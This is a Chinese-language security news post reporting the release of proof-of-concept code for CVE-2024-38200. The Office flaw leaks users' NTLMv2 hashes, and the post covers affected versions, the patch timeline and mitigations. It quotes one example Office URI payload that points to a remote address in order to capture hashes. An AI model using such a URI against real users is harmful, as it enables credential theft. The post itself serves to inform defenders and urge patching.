研究人员披露微软 Office 漏洞（CVE-2024-38200） 技术细节，发布PoC代码

会杀毒的单反狗 军哥网络安全读报 2024-10-04 09:01

导读

安全研究人员发布了针对最近披露的
Microsoft Office 漏洞CVE-2024-38200的概念验证 (PoC) 代码，该漏洞可能允许攻击者捕获用户的 NTLMv2 哈希值。

此高严重性漏洞影响
Microsoft Office 的多个版本，包括 Office 2016、Office 2019、Office LTSC 2021 和 Microsoft
365 企业版应用。

该漏洞最初由
PrivSec Consulting 的 Jim Rush 和 Synack 红队的 Metin Yunus Kandemir
报告，允许攻击者从受害者的系统发起到攻击者控制的远程服务器的出站 NTLM 连接。

当发生此连接时，Windows
会自动将用户的NTLM 哈希（包括哈希密码）发送到攻击者的服务器。

在 GitHub
上发布的 PoC 漏洞演示了如何使用 Office URI Schemes 利用该漏洞。

通过制作特殊格式的
URI（例如
ms-excel:ofe|u|http://192.168.1.7/leak.xlsx），攻击者可以诱骗 Office
应用程序访问远程文件而不触发任何警告。这允许通过 SMB 和 HTTP 协议捕获 NTLMv2 哈希。

研究人员指出，当与“Internet
属性”中的某些组策略对象 (GPO) 配置结合时，该漏洞尤其危险。

如果应用特定设置，例如将
IP 范围添加到受信任的站点或启用用户身份验证的自动登录，
Office 应用程序将自动执行 NTLM 身份验证，从而使利用变得更加容易。

微软于 2024 年
7 月 30 日通过 Feature Flighting 发布了部分修复，最终补丁于 2024 年 8 月 13 日发布。

安全专家建议采取几种缓解措施，包括限制到远程服务器的传出
NTLM 流量、将用户添加到受保护用户安全组以及阻止来自端口 TCP 445 的出站流量。

该漏洞 PoC
的发布凸显组织安装补丁并实施缓解措施的紧迫性。

安全专家提醒人们注意与
NTLM 身份验证相关的持续风险，微软已正式弃用该身份验证，转而采用 Kerberos 等更安全的替代方案。

随着威胁形势的不断演变，系统管理员和安全专业人员必须随时了解新出现的漏洞，并及时采取行动，保护他们的网络和用户免受利用
CVE-2024-38200 等漏洞的潜在攻击。

链接：

https://cybersecuritynews.com/poc-exploit-office-0-day-flaw/

扫码关注

军哥网络安全读报

讲述普通人能听懂的安全故事